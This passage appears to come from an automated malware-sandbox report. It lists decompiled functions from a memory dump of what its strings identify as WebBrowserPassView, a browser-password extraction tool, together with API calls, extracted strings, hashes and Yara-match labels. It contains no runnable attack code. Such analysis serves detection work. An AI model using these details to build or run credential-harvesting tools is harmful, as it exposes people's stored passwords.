                                                  • Opcode Fuzzy Hash: 9463777c25d7b60e80699a536a719800608f97c85c6655884db1f8f9bc34b99a
                                                  • Instruction Fuzzy Hash: DE61D570100705ABDB31AF25C885A2A73B9FF90724F04C63EF615A66E1D778ED50CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00441DE1, Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00441E61
                                                  • _wcsicmp.MSVCRT ref: 00441E76
                                                  • _wcsicmp.MSVCRT ref: 00441E8B
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407287
                                                    • Part of subcall function 00407278: wcslen.MSVCRT ref: 00407291
                                                    • Part of subcall function 00407278: _memicmp.MSVCRT ref: 004072AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp$wcslen$_memicmp
                                                  • String ID: .save$http://$https://$log profile$signIn
                                                  • API String ID: 1214746602-2708368587
                                                  • Opcode ID: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                  • Instruction ID: 7a979a8a07820355720b76b8412d60638824142cd7e99aea4044fab4cdb489ca
                                                  • Opcode Fuzzy Hash: 7c97f00c0957198ec044a334814b20feb48abd6bee8cf84da93a3bd7193c5eb8
                                                  • Instruction Fuzzy Hash: A34146755487014AF7309A65898177773E8CB04329F308A2FF86BE26E2EB7CB4C6551E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404F8A, Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                  • String ID:
                                                  • API String ID: 2313361498-0
                                                  • Opcode ID: 07ae1ada1d4f6eb4fb6f42e99af867561cb551597841fb4f97c145b1ea01b73e
                                                  • Instruction ID: ba4bb41810d6ea78f7103a52efe52e464eccc4a9d5620aafabcd38e7c3fa5a1e
                                                  • Opcode Fuzzy Hash: 07ae1ada1d4f6eb4fb6f42e99af867561cb551597841fb4f97c145b1ea01b73e
                                                  • Instruction Fuzzy Hash: 2331D3B1501601BFDB24AF69D94692AF7B8FF04304B10813EF145EB291D778EC90CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D0C3, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClientRect.USER32 ref: 0040D0E2
                                                  • GetWindowRect.USER32 ref: 0040D0F8
                                                  • GetWindowRect.USER32 ref: 0040D10B
                                                  • BeginDeferWindowPos.USER32 ref: 0040D128
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040D145
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040D165
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040D18C
                                                  • EndDeferWindowPos.USER32(?), ref: 0040D195
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClient
                                                  • String ID:
                                                  • API String ID: 2126104762-0
                                                  • Opcode ID: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                  • Instruction ID: 1b30ad45943261d114c7945feb8e2d934b1f0a15928f611d2c59e033839f0f44
                                                  • Opcode Fuzzy Hash: 3e059de2c2a39fa097f99da28ed46862c9af8e23a81d8ce39be14bc790b9e9d0
                                                  • Instruction Fuzzy Hash: 5F21D875900209FFDB11DFA8CD89FEEBBB9FB48701F104164F655A2160C771AA519B24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041604B, Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                  • String ID:
                                                  • API String ID: 4218492932-0
                                                  • Opcode ID: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                  • Instruction ID: b821822af8fa1f08beba458ee4fa97db6355aebb6f9a48b4278dc6bbcb45c8c8
                                                  • Opcode Fuzzy Hash: 91481d4031c4b0f89b54af3f497fb88c2307565dbaae607565dd24303698038d
                                                  • Instruction Fuzzy Hash: 601163F3900118ABDB00EFA4DC899DAB7ACEF19710F454536FA09DB144E674E748C7A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004072FB, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EmptyClipboard.USER32(?,?,0040D79F,-00000210), ref: 00407303
                                                  • wcslen.MSVCRT ref: 00407310
                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,0040D79F,-00000210), ref: 00407320
                                                  • GlobalLock.KERNEL32 ref: 0040732D
                                                  • memcpy.MSVCRT ref: 00407336
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040733F
                                                  • SetClipboardData.USER32 ref: 00407348
                                                  • CloseClipboard.USER32 ref: 00407358
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                  • String ID:
                                                  • API String ID: 1213725291-0
                                                  • Opcode ID: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                  • Instruction ID: e9f640a6ba64593c4f3b5e3a0a2b414f675f529f5a9edaa6aa7e0ad5043136ba
                                                  • Opcode Fuzzy Hash: 5ed3c7ed2292a9e609788bd9d251ea61b7faa26044294d95fe65c060bebd8173
                                                  • Instruction Fuzzy Hash: 14F0B43B5002187BD2102FE5AC4DE1B772CEB86F97B050179FA09D2251DE749E0486B9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404BC7, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404BDE
                                                  • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404BF7
                                                  • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404C04
                                                  • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404C10
                                                  • memset.MSVCRT ref: 00404C74
                                                  • SendMessageW.USER32(?,0000105F,?,?), ref: 00404CA9
                                                  • SetFocus.USER32(?), ref: 00404D2F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessageSend$FocusItemmemset
                                                  • String ID:
                                                  • API String ID: 4281309102-0
                                                  • Opcode ID: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                  • Instruction ID: e15596ac8dd535375262745d85448c61c7cc278dece76afc2af43b7580886122
                                                  • Opcode Fuzzy Hash: b5c774997c69c828c2af66cc8dd4e73b805abc013e05c1adb9cb4e53f9af2a7c
                                                  • Instruction Fuzzy Hash: 8B417C70901219BBDB20DF95CD85DAFBFB8FF08755F10406AF509A6291D3749E40CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BD8C, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  • wcscat.MSVCRT ref: 0040BE5B
                                                  • _snwprintf.MSVCRT ref: 0040BE82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite_snwprintfwcscatwcslen
                                                  • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                  • API String ID: 2451617256-4153097237
                                                  • Opcode ID: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                  • Instruction ID: be6843ca6d8e3427859c99e4dc5891dee3dff4c22b8a3cb8274265ecf8740657
                                                  • Opcode Fuzzy Hash: 69f2f7e6d8aec51d3960e337bc25a82fe45133c58c4b8b76eb8eb5bfe9207b33
                                                  • Instruction Fuzzy Hash: BC31A031900208EFDF04AF55CC86EEE7B75FF44320F10416AE905AB1E2DB75AA51DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A668, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ItemMenu$CountInfomemsetwcschr
                                                  • String ID: 0$6
                                                  • API String ID: 2029023288-3849865405
                                                  • Opcode ID: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                  • Instruction ID: 6379b183058c7bfcb2c9996af6a46f5bf8fbaffb9494aead0661b6c96fd4ce8b
                                                  • Opcode Fuzzy Hash: 5536c3878cefa137b9e834622b73aa06c1352d4f7dca5f5f14b9808a57972f50
                                                  • Instruction Fuzzy Hash: FF219A72505340ABD721DF55C84599BB7F8FB84745F044A3FFA84A2280E7B6CA10CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407A1C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset
                                                  • String ID: %2.2X
                                                  • API String ID: 2521778956-791839006
                                                  • Opcode ID: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                  • Instruction ID: ec6d441468c88601e944e5005585d56a697b1d5e2a610cd326798869af21cd90
                                                  • Opcode Fuzzy Hash: 23fbd524af4de12edaef0e362b86099d5f7adf1057b4181ed4aaf7bf29872c53
                                                  • Instruction Fuzzy Hash: 0F012D72E4431575F720AB519C46BBF73A89F40B19F10407FFC14A50C2EABCEA444A99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00441B86, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • wcscpy.MSVCRT ref: 00441B9B
                                                  • wcscat.MSVCRT ref: 00441BAA
                                                  • wcscat.MSVCRT ref: 00441BBB
                                                  • wcscat.MSVCRT ref: 00441BCA
                                                  • VerQueryValueW.VERSION(?,?,00000000,?), ref: 00441BE4
                                                    • Part of subcall function 00407447: wcslen.MSVCRT ref: 0040744E
                                                    • Part of subcall function 00407447: memcpy.MSVCRT ref: 00407464
                                                    • Part of subcall function 00407511: lstrcpyW.KERNEL32 ref: 00407526
                                                    • Part of subcall function 00407511: lstrlenW.KERNEL32(?), ref: 0040752D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                  • String ID: \StringFileInfo\
                                                  • API String ID: 393120378-2245444037
                                                  • Opcode ID: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                  • Instruction ID: a565dbaf5ef1236623e3a457584e7ee1bc303587053621a732091bcd91b9d386
                                                  • Opcode Fuzzy Hash: cb6593bce41ce7101ed3919308bda3c7e7c8e8e4aeb4a4d700e0b9c8d6b6edb1
                                                  • Instruction Fuzzy Hash: 27017C7290020CB6EF51EAA1CD45EDF77BCAF04308F4005A7B514E2052EB78DB86AB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040A497, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintfwcscpy
                                                  • String ID: dialog_%d$general$menu_%d$strings
                                                  • API String ID: 999028693-502967061
                                                  • Opcode ID: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                  • Instruction ID: 8e174b2d8d79018ad6e296a97c01706163ed31911536b8ede193c50f01e1bc5f
                                                  • Opcode Fuzzy Hash: 8becf3e9218155cd2e90e25ed978c4695a92d6ded04a6fa8cdd08c494461b467
                                                  • Instruction Fuzzy Hash: CBE0B679A8830079F96025861E4BB2E61508774F59FB0886FF50AB05D1E9FE95A8710F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00412BDF, Relevance: 10.5, APIs: 2, Strings: 5, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: !-A$Y,A$a,A$a,A$,A
                                                  • API String ID: 3510742995-194831239
                                                  • Opcode ID: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
                                                  • Instruction ID: c1edbe63f0487e6d5a9ef4690cfcbd933ff0b0d7cc0200e8d9d6566c39fc0ab4
                                                  • Opcode Fuzzy Hash: 222890697f8a5ff6857447b5b90ef297a0c92120cc092e5eca8f4e6b223797c7
                                                  • Instruction Fuzzy Hash: C8E04F35980610EAF330DB459C07B863394A796756F50C43BF508A6193C6FC599C8B9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00428591, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset
                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                  • API String ID: 2221118986-1606337402
                                                  • Opcode ID: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
                                                  • Instruction ID: a56ed1d78848c17894bc611d03527086a745bd119e00672256ad5f5daa2e3940
                                                  • Opcode Fuzzy Hash: 46f26c3fdd6910b4d7312f8d71752383c86baf733d40e003e56e3ea4decbe60e
                                                  • Instruction Fuzzy Hash: 93818E706093619FDB10DF15E88161FB7E0BF98354F94885FE8849B252EB78EC44CB9A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00410EDB, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040F96C,00000000,00000000), ref: 00410F16
                                                  • memset.MSVCRT ref: 00410F78
                                                  • memset.MSVCRT ref: 00410F88
                                                    • Part of subcall function 00410DF5: wcscpy.MSVCRT ref: 00410E1E
                                                  • memset.MSVCRT ref: 00411073
                                                  • wcscpy.MSVCRT ref: 00411094
                                                  • CloseHandle.KERNEL32(?,0040F96C,?,?,?,0040F96C,00000000,00000000), ref: 004110EA
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                  • String ID:
                                                  • API String ID: 3300951397-0
                                                  • Opcode ID: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
                                                  • Instruction ID: ff77c4a4bb0d76b6113ba9f034b07e179d87586f5f3f4fadb46fa2bb0041fc85
                                                  • Opcode Fuzzy Hash: b54469c95767e19cd25d0ac2b448a79aecc0fd22ddb34440915382161dbe33e5
                                                  • Instruction Fuzzy Hash: CB5170B0508381AFD720DF55DC85A9BBBE8FBC8305F00492EF68882261DB74D985CB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D53E, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040D560
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                    • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                    • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                    • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                    • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                    • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                    • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                    • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                    • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                    • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                    • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                    • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                    • Part of subcall function 00407B1D: GetSaveFileNameW.COMDLG32(?), ref: 00407B6C
                                                    • Part of subcall function 00407B1D: wcscpy.MSVCRT ref: 00407B83
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 1392923015-3614832568
                                                  • Opcode ID: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
                                                  • Instruction ID: 456ec3227f593179f02471f626d387f8bd8a0122acdd439c58b7a13f613657e4
                                                  • Opcode Fuzzy Hash: 380410c26e3291804c03af3795505405ed94cd18fa0364bdc388fa92e87f834b
                                                  • Instruction Fuzzy Hash: 6131FAB1D002599BDB50EFA9D8C1AEDBBB4FF09314F10417AF508B7282DF385A458B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415DF9, Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00415E2B
                                                  • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00415E39
                                                  • free.MSVCRT(00000000), ref: 00415E7F
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFilefreememset
                                                  • String ID:
                                                  • API String ID: 2507021081-0
                                                  • Opcode ID: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
                                                  • Instruction ID: de39e7dabe3dcffc9507685f2d24beb71d21f2267e90135c35d9c9407e9ebe28
                                                  • Opcode Fuzzy Hash: e3e327bc7edfa6d214c9f68350b0f1db51016015cf148b15bb91f804a777c83b
                                                  • Instruction Fuzzy Hash: B111A236D04B05EBDB106FB498C06FF7368AA85754B54013BF911E6280D7789F8195AA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00414D24, Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • AreFileApisANSI.KERNEL32 ref: 00414D2B
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D49
                                                  • malloc.MSVCRT ref: 00414D53
                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00414D6A
                                                  • free.MSVCRT(?), ref: 00414D73
                                                  • free.MSVCRT(?,?), ref: 00414D91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                  • String ID:
                                                  • API String ID: 4131324427-0
                                                  • Opcode ID: 5d2fa95a5ae56aca068832dc9df58c4b26db0adcf1ab4a8fdf40dc6136318e35
                                                  • Instruction ID: 75ff5f127907765bac19b59c8f0cf631f86937604d45831965c424c16304f1b7
                                                  • Opcode Fuzzy Hash: 5d2fa95a5ae56aca068832dc9df58c4b26db0adcf1ab4a8fdf40dc6136318e35
                                                  • Instruction Fuzzy Hash: 3501D4725041257BAF225BB6AC41DFF369CDF857B4721022AFC04E3280EA288E4141EC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004159C6, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00415592), ref: 00415A0A
                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00415592), ref: 00415A32
                                                  • free.MSVCRT(00000000,0044A338,00000000), ref: 00415A5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PathTemp$free
                                                  • String ID: %s\etilqs_$etilqs_
                                                  • API String ID: 924794160-1420421710
                                                  • Opcode ID: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
                                                  • Instruction ID: 407cf19e3f66aff666bf3235626637e86bc259e86a40955958787b48e693a0c3
                                                  • Opcode Fuzzy Hash: c9ef72f7e900502d242bf52f2b84dfc3543ee2498ca2d646e121c62c04ad21fe
                                                  • Instruction Fuzzy Hash: 80316831A44645DAE720EB61DCC1BFB739C9FA4348F1405BFE841D6182FE6C8EC54A19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C0F2, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  • memset.MSVCRT ref: 0040C129
                                                    • Part of subcall function 004124C0: memcpy.MSVCRT ref: 0041253D
                                                    • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                    • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                  • _snwprintf.MSVCRT ref: 0040C173
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileWrite_snwprintf_wcslwrmemcpymemsetwcscpywcslen
                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                  • API String ID: 2236007434-2769808009
                                                  • Opcode ID: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
                                                  • Instruction ID: bd8afa7c54c2b984639c4d8fb182e53c6b214fce1ab7be0445daf1b4a409d2ac
                                                  • Opcode Fuzzy Hash: 438c6ceffbcd68a890abf2b9136991ccf46c150bae825d1d06f9ba09c855681a
                                                  • Instruction Fuzzy Hash: 82119132904615BFEB11AF65DC82E99BB74FF04318F10402AF9046A5E2DB75B960CBD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D83C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040D86C
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                  • wcsrchr.MSVCRT ref: 0040D886
                                                  • wcscat.MSVCRT ref: 0040D8A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                  • String ID: .cfg$General
                                                  • API String ID: 776488737-1188829934
                                                  • Opcode ID: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                  • Instruction ID: b769b6074c2bbd437ee926744873151467191c08e4afcaaf49059e595a4f98b4
                                                  • Opcode Fuzzy Hash: e11df5378bc83a8aaf871442e4d8661d85e0e936ac587c009724adb380b412fa
                                                  • Instruction Fuzzy Hash: 34119877901318AADB10EF55DC45ECE7378AF48314F1041F6F518A7182DB78AA848F9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E030, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040E051
                                                  • RegisterClassW.USER32 ref: 0040E076
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040E07D
                                                  • CreateWindowExW.USER32 ref: 0040E09C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                  • String ID: WebBrowserPassView
                                                  • API String ID: 2678498856-2171583229
                                                  • Opcode ID: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                  • Instruction ID: d6937ed4ed068f8a41babfbfc400960a7e9d41ce1fcf29d78c1aeb4d070e2d0f
                                                  • Opcode Fuzzy Hash: 968ab77318ecbfefce790601fd2619178d52abf01415595e0110a8aaad309429
                                                  • Instruction Fuzzy Hash: 5301C4B1901629ABDB019F998D89ADFBFBCFF09B50F10421AF514A2240D7B45A408BE9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C2C7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C2EB
                                                  • memset.MSVCRT ref: 0040C302
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                    • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
                                                    • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
                                                  • _snwprintf.MSVCRT ref: 0040C33E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
                                                  • String ID: <%s>$<?xml version="1.0" ?>
                                                  • API String ID: 168708657-3296998653
                                                  • Opcode ID: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                  • Instruction ID: 826567bfe222e6a97a7157a9ef984588091dd6de8d25c20f5ec279ce0d2f683a
                                                  • Opcode Fuzzy Hash: a73eef4ca532f3c806c8f7c4fb546103b4f23db77d3a0b99a33ba88c35d7e7d6
                                                  • Instruction Fuzzy Hash: 780167F2D401297AEB20A755CC46FEE767CEF44308F0000B6BB09B61D1DB78AA458A9D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

